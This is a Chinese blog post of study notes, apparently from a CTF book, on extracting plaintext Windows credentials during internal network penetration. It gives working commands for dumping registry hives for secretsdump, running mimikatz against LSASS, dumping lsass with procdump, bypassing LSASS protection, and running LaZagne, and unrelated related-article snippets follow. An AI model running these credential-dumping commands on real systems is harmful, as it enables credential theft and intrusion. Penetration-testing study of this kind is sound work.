内网渗透之获取明文身份凭证

最新推荐文章于 2024-08-18 10:44:45 发布
最新推荐文章于 2024-08-18 10:44:45 发布
阅读量861 收藏 1
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/114090253
版权

内网渗透之获取明文身份凭证

0 前言

下文主要是从《从0到1的CTFer成长之路》阅读所做的笔记,处于备忘的目的,主要内容是内网渗透中获取控制主机的明文身份凭证的几种方法,归纳角度从原理和方法两个角度写。。

1 LSA Secret

原理

本地安全策略,存储私有数据,用户和系统的敏感数据都存储在LSA Secrets的注册表中
操作

开始--运行bai--(输入)regedit--回车


在这里插入图片描述

Secrets里面存在用户的一些default

方法

先导出注册表项

reg save hklm\sam C:\sam.save
reg save hklm\security C:\security.save
reg save hklm\system C:\system.save

在这里插入图片描述

然后用impacket的 secretsdump脚本加载
https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py

usage

secretsdumps.py -sam sam.save -security security.save -system system.save LOCAL

2 LSASS PROcess

原理

本地安全性授权服务,明文存储用户身份凭证,以进程的形式运行。注册表中有个参数的值能影响LSASS是否明文存储用户身份凭证,但实际上如果有足够的权限,完全可以修改这个选项。

方法

(1)mimikatz提取密码
https://github.com/gentilkiwi/mimikatz

mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" exit

(2) procdump+mimikatz
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

procdump.exe -accepteula -ma lsass.exe xxx.dmp 2>&1

mimikatz.exe "sekurlsa::minidump c:\lsass.dmp" "sekurlsa::logonPasswords full" exit

3 LSASS 防护绕过

原理

为了保护进程不被转存,注册表中定义了一个开关,保护不被转存。

方法

mimikatz使用驱动强行去除保护绕过

.\mimikatz.exe
privilege::debug
sekurlsa:logonpasswords

4 Credential Manager

原理

credential manager存储用户的登录凭证,win凭据管理是保存访问web站点的账号密码,远程连接其他主机或共享路径的账号密码。

方法

mimikatz

privilege::debug
sekurlsa::credman

5 lazagne

原理

除了以上的win自带的机制之外,主机内部可能还会存在一些敏感文件、软件缓存、内存、日志、wifi等维度存储了明文密码,为了提升工作效率,lazagne将这些操作进行了自动化集合,技术栈是python
https://github.com/AlessandroZ/LaZagne

方法

laZagne.exe all -oA -output C:\Users\test\Desktop
_HWHXY
关注
专栏目录
域渗透之影卷拷贝获取域内全部hash
weixin_66717977的博客
03-13 985
网络安全 | 内网渗透 | 域渗透 | 影卷拷贝
怎么在github上看密钥_在GitHub上公开秘密:泄露凭证和API密钥后该怎么办
编程故事的地方
03-27 1507
怎么在github上看密钥 作为开发人员,如果发现刚刚将敏感文件或机密公开给公共git存储库,则需要执行一些非常重要的步骤。 什么是秘密? 在本文档中,当我们使用“秘密”一词时,我们指的是用于认证或授权自己的任何事物,最常见的是API密钥,数据库凭证或安全证书。 第一步,呼吸:在大多数情况下,如果您认真遵循本指南,则只需几分钟即可消除大部分潜在损害。 这篇文章将介绍消除风险并确保将来不会...
secretsdump.py 使用教程
最新发布
gitblog_00931的博客
08-18 391
secretsdump.py 使用教程 secretsdump.pyEnhanced version of secretsdump.py from Impacket. Adds multi-threading and accepts an input file with a list of target hosts for simultaneous secrets extraction.项目地址...
内网渗透初探(三) | 查缺补漏
weixin_42508548的博客
12-23 4435
一、前言 从linux打进去到域环境,到获取域控权限。因为前面基本都是在讲windows,这里补一篇linux的,全篇实操,喜欢的小伙伴们快来呀~ 二、外网打点 1、打开站点,很正常的一个登录界面 2、尝试登录后发现典型的shiro特征。 3、使用工具直接打shiro反序列化即可。 下载地址: GitHub - j1anFen/shiro_attack: shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马) 4、直接上冰蝎马,连接 三、权限维持 权限维持其实看
内网渗透--提取域控NTDS
qq_62169455的博客
09-24 829
NTDS.DIT:为DC的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控上的用户(如域管用户、DC本地管理员用户)可以访问,为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。位置:C:\Windows\NTDS该文件和SAM文件类似,是不能直接读取的,也不能复制。
【渗透笔记】域内密码凭证获取
白菜猪肉炖粉条
12-28 1709
Volume Shadow Copy 活动目录数据库 ntds.dit 活动目录数据库,包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。 为了保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。 因此想要破解sam文件和ntds.dit文件都需要拥有一个system文件 ntds.dit文件位置:%SystemRoot%\NTDS\NTDS.dit system文件位置:%SystemRoot%\System32\config\SYSTEM sa
Python实现通过文件路径获取文件hash值的方法
09-21
主要介绍了Python实现通过文件路径获取文件hash值的方法,结合实例形式分析了Python针对文件进行hash运算的实现方法与相关注意事项,需要的朋友可以参考下
内网渗透Windows密码凭证获取
qq_46258964的博客
06-09 2800
记录一下抓取window凭证信息的一些工具 Windows凭证抓取1,procdump (官方工具无视免杀)(首选) procdump + mimikatz 加载dmp文件,并导出其中的明文密码(procdump过杀软) 2,注册表读取windows hash (首选) 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 注册表读取密码主要获取的是3个文件 3,Pwdump 4,mimikatz(名声最大的密码获取工具) 5,MSF MSF框架密
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 2667
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
#资源分享达人# 红蓝对抗之Windows内网渗透.zip
08-03
内网渗透测试】 内网渗透测试是一种模拟黑客攻击行为,对内部网络系统进行安全评估的方法。它旨在发现并修复组织内部网络中的安全漏洞,防止真实攻击者利用这些漏洞进行非法活动。红蓝对抗则是内网渗透测试的一种...
SharpSecDump:.Impacket的secretsdump.py的远程SAM + LSA秘密转储功能的.Net端口
03-19
夏普转储 impacket的secretsdump.py的远程SAM + LSA秘密转储功能的.Net端口。默认情况下,在当前用户的上下文中运行。请仅在您拥有或有权测试的环境中使用:) 用法 SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=test.local 必需标志 -target-逗号分隔的要扫描的IP /主机名列表。请不要在地址之间包含空格。通过将target设置为127.0.0.1,还可以在本地系统上转储哈希。 可选标志 -u-要使用的用户名,如果要使用备用凭据来运行。必须与-p和-d标志一起使用 -p -明文密码才能使用,如果你想使用备用凭据运行。必须与-u和-d标志一起使用 -d-要使用的域(如果要使用备用凭据运行)(对于本地域)。必须与-u和-p标志一起使用 -threads-用于并发枚举多个
内网渗透-Windows内网渗透
lza20001103的博客
08-15 1881
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
什么是DCSync
sangfor_edu的博客
10-28 749
在域环境中,域控制之间每十五分钟就会进行一次域数据同步。当域控制A需要从域控制器B获取数据时,会向其发送一个 GetNCChanges 请求,该请求包含了需要同步的数据,如果获取的数据较多,则会进行循环请求。DCSync是mimikatz在2015年添加的一个功能,利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges 接口模仿一个域控制器向另一个域控制器发起数据同步请求,能够用来导出域内所有用户的hash。
ATT&CK-T1003-002 - 操作系统凭据转储:安全帐户管理器
swordheart的博客
12-07 629
攻击者可能会尝试通过内存技术或通过存储 SAM 数据库的 Windows 注册表从安全帐户管理器 (SAM) 数据库中提取凭证材料。SAM 是一个数据库文件,其中包含主机的本地帐户,通常是使用**** 命令找到的帐户。枚举 SAM 数据库需要 SYSTEM 级别的访问权限。许多工具可用于通过内存技术检索 SAM 文件:或者,可以使用 Reg 从注册表中提取 SAM:然后可以使用 Creddump7 在本地处理 SAM 数据库以检索哈希值。可以通过三个注册表项枚举本地 SAM(SAM 和系统)、缓存凭证(系统
内网渗透之凭据收集的各种方式
cike_y
09-07 983
本地安全机构服务器服务 (LSASS) 是一个 Windows 进程,用于处理操作系统安全策略并在系统上强制执行。它验证登录帐户并确保密码、哈希值和Kerberos票证。Windows 系统将凭据存储在 LSASS 进程中,使用户能够访问网络资源, 例如文件共享、SharePoint 站点和其他网络服务,而无需在每次用户连接时输入凭据。LSASS 进程对于红队来说是一个诱人的目标,因为它存储有关用户帐户的敏感信息。LSASS 通常被滥用来转储凭据以提升权限、窃取数据或横向移动。
内网渗透攻击技术的利用
kali_Ma的博客
09-14 2232
DCSync 是什么 在域环境中,不同域控制器(DC)之间,每 15 分钟都会有一次域数据的同步。当一个域控制器(DC 1)想从其他域控制器(DC 2)获取数据时,DC 1 会向 DC 2 发起一个 GetNCChanges 请求,该请求的数据包括需要同步的数据。如果需要同步的数据比较多,则会重复上述过程。DCSync 就是利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges 接口向域控发起数据同步请求。 DCSync 是域渗透中经常会
ATT&CK-T1003-004-操作系统凭据转储:LSA 机密
swordheart的博客
12-26 503
从以上实验可以看出,正常来说,LSA 允许应用程序以用户权限运行,但是我们可以使用 psexec 将 reg.exe 作为系统权限运行并转储 LSA 机密,通过psexec和mimikatz的token:: elevate可以提升系统的权限,转储LSA的机密信息。攻击者可能会使用密钥来协助提取密码和枚举其他敏感系统信息,通过psexec可以绕过火绒防护,轻松获取LSA的机密信息。
域控安全 ----> Ntds.dit文件抓取
huohaowen的博客
05-05 1649
大家还记得内网渗透的初衷吗???找到域馆,拿下域控!!拿下了域控就是拿下了整个域!!但是大家知道拿下域环境之后应该怎么操作吗(灵魂拷问)???那么下面,开始我们今天的内容 NTDS.DIT文件!!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值